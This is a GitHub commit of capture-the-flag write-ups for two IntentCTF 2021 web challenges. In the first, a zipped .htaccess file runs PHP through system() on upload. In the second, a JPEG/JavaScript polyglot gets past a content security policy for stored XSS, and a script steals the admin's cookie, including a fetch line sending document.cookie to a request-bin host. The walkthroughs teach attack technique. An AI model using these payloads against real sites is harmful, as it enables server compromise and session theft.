Skip to content

Commit

Permalink
IntentCTF
Browse files Browse the repository at this point in the history
  • Loading branch information
Dvd848 committed Nov 16, 2021
1 parent af74ecf commit 28003ff
Show file tree
Hide file tree
Showing 21 changed files with 1,026 additions and 0 deletions.
128 changes: 128 additions & 0 deletions 2021_IntentCTF/Careers.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,128 @@
# Careers
* Category: Web
* 100 Points
* Solved by the JCTF Team

## Description

> We got hacked,
>
> We're trying to indentify the ROOT cause.
>
> If you are a l33t h4x0r, please upload your resume.

## Solution

The attached website allows uploading CVs:

```html
<div class="bg-dark text-secondary px-4 py-5 text-center">
<div class="py-5">
<h1 class="display-5 fw-bold text-white">Careers, CV Upload Page</h1>
<div class="col-lg-6 mx-auto">
<p class="fs-5 mb-4">Upload your CV using txt format only, please archive the files using zip format.</p>
<form method="post" enctype="multipart/form-data">
<input type="file" name="zip_file" />
<br /> <br />
<input type="submit" name="btn_zip" class="btn btn-info" value="Upload" />
</div>
</div>
<p>
</p>
</div>
```

All we need to do is zip our CV and upload it:

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ echo "This is a test." > test.txt

┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ zip test.zip test.txt
adding: test.txt (stored 0%)
```

Once we do, we get the following message:

```html
<p class="fs-5 mb-4">Thank you!, our recruiter will contact you ASAP, your candinate ID is: 37a0e2f4f4999c7aaadfe6b3009354f7,
<br><a href="./upload/37a0e2f4f4999c7aaadfe6b3009354f7" class="link-success">37a0e2f4f4999c7aaadfe6b3009354f7 Files</a></p>
```

We can visit that link and see that our CV was extracted there:

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ curl -k 'https://careers.chal.intentsummit.org/upload/37a0e2f4f4999c7aaadfe6b3009354f7/test.txt' -H 'Cookie: intent-ctf-session=6788422a5e4230e038bd5673cc4708aa'
This is a test.
```

This is a PHP site, so we should start by trying to upload a PHP file.

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ cat phpinfo.php
<?php
phpinfo();
?>

┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ zip php.zip phpinfo.php test.txt
updating: phpinfo.php (stored 0%)
adding: test.txt (stored 0%)
```

However, those don't seem to get extracted to the upload directory.

The next best thing would be an `.htaccess` file that executes PHP:

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ cat .htaccess
<Files .htaccess>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
Order allow,deny
Allow from all
php_flag engine on
</Files>
php_value auto_prepend_file .htaccess
#<?php echo system("cat $(find / -name flag)")."<br />"; ?>

┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ zip htaccess.zip .htaccess test.txt
adding: .htaccess (deflated 32%)
adding: test.txt (stored 0%)
```

Once uploaded, we get:

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Careers]
└─$ curl -k 'https://careers.chal.intentsummit.org/upload/7781187f9f7f6de411a91c2396f15859/.htaccess' -H 'Cookie: intent-ctf-session=6788422a5e4230e038bd5673cc4708aa'
<Files .htaccess>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
Order allow,deny
Allow from all
php_flag engine on
</Files>
php_value auto_prepend_file .htaccess
#a
INTENT{zipfiles_are_awsome_for_pt}INTENT{zipfiles_are_awsome_for_pt}<br />
<Files .htaccess>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
Order allow,deny
Allow from all
php_flag engine on
</Files>
php_value auto_prepend_file .htaccess
#a
INTENT{zipfiles_are_awsome_for_pt}INTENT{zipfiles_are_awsome_for_pt}<br />
```
198 changes: 198 additions & 0 deletions 2021_IntentCTF/Darknet_Club.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,198 @@
# Darknet Club
* Category: web
* 200 Points
* Solved by the JCTF Team

## Description

> There is a new invite system for the most exclusive darknet websites.
>
> Can you help me get an in?
## Solution

We enter the attached website and are presented with a register/login page:

![](images/darknet1.png)

We need to enter our username, email, referral and password. After registering, we arrive to the following screen:

![](images/darknet2.png)

On the right side, we can see a "request invitation" button which triggers the following code:

```javascript
async function report() {

$("#submit-btn").prop("disabled", true); // disable multiple submission

// prepare alert
let card = $("#resp-report");
card.text("Your submission is awaiting approval by Admin!");
card.attr("class", "alert alert-info");
card.show();

let data = {};

await fetch('/api/report', {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
});

$("#submit-btn").prop("disabled", false);
}
```

This gives us the ability to have the admin visit some page, which usually means that we need to inject some Javascript to the page they're visiting and have them unknowingly execute some malicious code.

Using the "edit" button, we can edit the different fields and look for XSS:

![](images/darknet3.png)

Therefore, we can insert `<script>console.log('XSS')</script>` into each of the fields and see if anything gets logged to the console. When inserting the snippet to the `referral` field, we get a log in the console, but not the one we were hoping for:

```
Refused to execute inline script because it violates the following Content Security Policy directive: "default-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-GENXFgllQ+w2L5qjIm/unWJsx1gGFLQVAhqyNNs8gL4='), or a nonce ('nonce-...') is required to enable inline execution. Note also that 'script-src' was not explicitly set, so 'default-src' is used as a fallback.
```

It turns out that the site has a CSP which prevents executing inline Javascript code:

```
content-security-policy: default-src 'self'; object-src 'none'; style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com;
```

In order to execute Javascript, we'll need to include a script from the same origin as the site. Luckily, we have an upload API:

```javascript
async function upload() {

$("#upload-btn").prop("disabled", true); // disable multiple submission

// prepare alert
let card = $("#resp-msg");
card.text('Please wait...');

// validate
if ($('input[type=file]')[0].files.length == 0) {
card.text('Please select a file to upload!');
$("#upload-btn").prop("disabled", false);
return;
}

let avatarFile = $('input[type=file]')[0].files[0];
let formData = new FormData();
formData.append('avatarFile', avatarFile);

await fetch('/api/upload', {
method: 'POST',
credentials: 'include',
body: formData,
})
.then((response) => response.json()
.then((resp) => {
if (response.status == 200) {
avatarFile.value = []; // reset file input
$('#file-label').text("Select profile avatar..."); // update label
card.text(resp.message);
console.log(resp.message) // set response message
document.location.reload(); //refresh
}
if (response.status == 500){
card.text("This file could not be uploaded, only JPEG files are allowed! ");
}
}))
.catch((error) => {
card.text("This file could not be uploaded, only JPEG files are allowed! ");
});

$("#upload-btn").prop("disabled", false);
}
```

The only problem is that the server rejects any file that isn't a JPEG file. Sometimes the check is based only on the file extension, but in this case there seems to be some kind of content-based check. We need a file that will pass as a JPEG file but also one where we can embed some Javascript code, or in other words, a [polyglot file](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a):

> Polyglots, in a security context, are files that are a valid form of multiple different file types.
You can find an example for a JPEG-Javascript polyglot [here](https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs), but we found that the challenge uses a much simpler check for JPEG files: It just checks that the first four bytes are `FF D8 FF E0`. So, in order to create a valid polyglot for the sake of the challenge, we could just use it as a variable name:

```console
┌──(user@kali)-[/media/sf_CTFs/intent/Darknet_Club]
└─$ hexdump -C poly1.jpg
00000000 ff d8 ff e0 20 3d 20 31 3b 0a 0a 63 6f 6e 73 6f |.... = 1;..conso|
00000010 6c 65 2e 6c 6f 67 28 22 78 73 73 22 29 3b |le.log("xss");|
0000001e
```

Now, let's try to upload it and include it as a script via the vulnerable "referral" field:

```html
<script src="https://darknet-club.chal.intentsummit.org/api/avatar/user1"></script>
```

![](images/darknet4.png)

When we refresh the page, we get another unexpected error in the console:

```
Uncaught SyntaxError: Invalid or unexpected token
```

Luckily, the PortSwigger article above explains that this is related to default charset interpretation, and in order to work around the default UTF-8 interpretation we can specify the following charset:

```html
<script charset="ISO-8859-1" src="https://darknet-club.chal.intentsummit.org/api/avatar/user1"></script>
```

Once we enter this as the referrer, we can finally see "xss" getting printed to the console! This means that we have some form of XSS, and now we need to proceed to the next phase of leaking the admin's info.

We might want to leak the cookie using a RequestBin request, such as:

```javascript
fetch("https://enhqnnej2mgj5.x.pipedream.net?" + btoa(document.cookie));
```

However, that's blocked by the CSP as well:

```
Refused to connect to 'https://enhqnnej2mgj5.x.pipedream.net/' because it violates the following Content Security Policy directive: "default-src 'self'". Note that 'connect-src' was not explicitly set, so 'default-src' is used as a fallback.
```

So, in order to leak the admin's cookie, we'll utilize a different capability that doesn't violate the CSP: We'll cause the admin to register a new user with a known username and password, and leak the cookie via the referral field:

```javascript
״א = 1;

if (window.navigator.userAgent.search("HeadlessChrome") != -1)
{
const headers = new Headers()
headers.append("Content-Type", "application/json")

body = {username: "leak", password: "cookie", email: "leak@mail.com", referral: btoa(document.cookie)}


const options = {
method: "POST",
headers,
mode: "cors",
body: JSON.stringify(body),
}

fetch("https://darknet-club.chal.intentsummit.org/api/register", options)
}
```

Notice how we restrict the script to the remote browser so that it doesn't run first locally and register the user with our cookie. In this example we chose to restrict the script to a headless browser but there are many other options.

After reporting the account, we can finally login as our new user and get the flag:

![](images/darknet5.png)


```console
┌──(user@kali)-[/media/sf_CTFs/intent/Darknet_Club]
└─$ echo ZmxhZz1JTlRFTlR7YV9qcDM2XzFzX3cwcjdoX2FfN2gwdTU0bmRfdzByZDV9 | base64 -d
flag=INTENT{a_jp36_1s_w0r7h_a_7h0u54nd_w0rd5}
```
Loading

0 comments on commit 28003ff

Please sign in to comment.